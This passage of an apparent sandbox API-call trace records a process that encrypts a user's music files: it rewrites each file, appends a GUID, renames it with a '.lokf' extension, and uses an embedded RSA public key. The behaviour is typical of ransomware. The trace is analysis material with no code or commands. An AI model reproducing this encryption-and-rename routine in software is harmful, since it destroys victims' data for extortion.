1 [0059.901] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.901] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0059.901] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0059.901] GetCurrentThreadId () returned 0x9e0 [0059.901] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0059.901] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c84e38 [0059.901] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0059.902] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8610 [0059.902] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0059.902] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.902] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0059.902] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326fa10 [0059.902] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.902] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.902] GetCurrentThreadId () returned 0x9e0 [0059.902] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.902] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.902] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0059.902] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.902] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.902] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.902] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.902] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0059.902] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0059.902] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.902] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0059.902] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.902] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0059.902] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.902] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0059.902] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.902] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.902] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0059.902] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0059.902] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0059.902] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0059.902] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.902] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0059.902] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c859f8 [0059.902] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.902] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0059.902] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.902] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.903] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0059.903] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0059.903] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0059.903] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85a10 [0059.903] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0059.903] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0059.903] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0059.903] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c859e0 [0059.903] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0059.903] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85770 [0059.903] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.903] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f40 [0059.903] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.903] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0059.903] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.903] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857e8 [0059.903] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0059.903] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85a28 [0059.903] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0059.903] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857b8 [0059.903] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857e8 | out: hHeap=0x660000) returned 1 [0059.903] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0059.903] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.903] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0059.903] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0059.903] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0059.903] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c859f8 | out: hHeap=0x660000) returned 1 [0059.903] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c859f8 [0059.903] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.903] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0059.903] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0059.903] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0059.903] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0059.903] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x326a370 [0059.904] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.904] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3234418 [0059.904] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0059.904] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0059.904] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c859f8 | out: hHeap=0x660000) returned 1 [0059.904] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x326a588 [0059.904] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0059.904] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0059.904] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.904] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8610 | out: hHeap=0x660000) returned 1 [0059.904] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0059.904] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0059.904] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0059.904] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0059.904] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0059.904] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a588 | out: hHeap=0x660000) returned 1 [0059.904] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0059.904] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0059.904] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85a28 | out: hHeap=0x660000) returned 1 [0059.904] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.904] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0059.904] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0059.904] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85a10 | out: hHeap=0x660000) returned 1 [0059.904] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c859e0 | out: hHeap=0x660000) returned 1 [0059.904] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0059.904] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0059.904] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326fa10 | out: hHeap=0x660000) returned 1 [0059.904] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c859c8 | out: hHeap=0x660000) returned 1 [0059.905] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c88718 | out: hHeap=0x660000) returned 1 [0059.905] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0059.905] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0059.905] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0059.905] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0059.905] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0059.905] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.905] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0059.905] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0059.905] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.905] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.905] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0059.905] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c88ae8*, nNumberOfBytesToWrite=0x12eff, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c88ae8*, lpNumberOfBytesWritten=0x9f4fb14*=0x12eff, lpOverlapped=0x0) returned 1 [0059.906] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c88ae8 | out: hHeap=0x660000) returned 1 [0059.906] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x12f04, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.906] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f908*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.906] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0059.906] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0059.906] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x326a370 [0059.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x326a370, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0059.906] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3294ac8 [0059.906] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0059.906] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0059.906] WriteFile (in: hFile=0x5cc, lpBuffer=0x3294ac8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3294ac8*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0059.906] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3294ac8 | out: hHeap=0x660000) returned 1 [0059.906] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.906] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.906] CloseHandle (hObject=0x5cc) returned 1 [0059.907] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8610 [0059.907] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x890) returned 0x3268798 [0059.907] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8610 | out: hHeap=0x660000) returned 1 [0059.907] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\2frIwLIsuulHRSHkT.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\2friwlisuulhrshkt.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\2frIwLIsuulHRSHkT.wav.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\2friwlisuulhrshkt.wav.lokf")) returned 1 [0059.908] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.908] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.908] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.909] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adbb0 | out: hHeap=0x660000) returned 1 [0059.909] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48f3b7c0, ftCreationTime.dwHighDateTime=0x1d4d360, ftLastAccessTime.dwLowDateTime=0xe47237a0, ftLastAccessTime.dwHighDateTime=0x1d4c5da, ftLastWriteTime.dwLowDateTime=0xe47237a0, ftLastWriteTime.dwHighDateTime=0x1d4c5da, nFileSizeHigh=0x0, nFileSizeLow=0x4f09, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2u2pj-4.mp3", cAlternateFileName="")) returned 1 [0059.909] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0059.909] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8e) returned 0x32adbb0 [0059.909] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0059.909] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\2u2pj-4.mp3") returned=".mp3" [0059.909] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\2u2pj-4.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\2u2pj-4.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.909] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=20233) returned 1 [0059.909] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.959] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x4ee3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.959] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.959] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.959] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.959] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.959] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x4f09, lpOverlapped=0x0) returned 1 [0059.960] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.960] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.960] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.960] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.960] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8610) returned 1 [0059.960] CryptCreateHash (in: hProv=0x6b8610, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.960] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.960] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.960] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.961] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.961] GetLastError () returned 0x0 [0059.961] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.961] CryptReleaseContext (hProv=0x6b8610, dwFlags=0x0) returned 1 [0059.961] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.961] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.961] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.961] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.961] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.961] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.961] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.961] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4f10) returned 0x9c88ae8 [0059.961] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0059.961] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.961] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0059.961] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.961] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0059.961] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0059.961] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c88718 [0059.961] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c859c8 [0059.961] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c88760 [0059.961] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c859e0 [0059.961] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85a10 [0059.961] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0059.961] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85a28 [0059.961] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0059.961] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0059.961] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0059.961] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0059.962] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85a10 | out: hHeap=0x660000) returned 1 [0059.962] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85a28 | out: hHeap=0x660000) returned 1 [0059.962] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0059.962] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0059.962] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0059.962] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0059.962] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278ec0 [0059.962] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85a28 [0059.962] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0059.962] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c85a10 [0059.962] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f30 [0059.962] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0059.962] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.962] RtlAllocateHeap 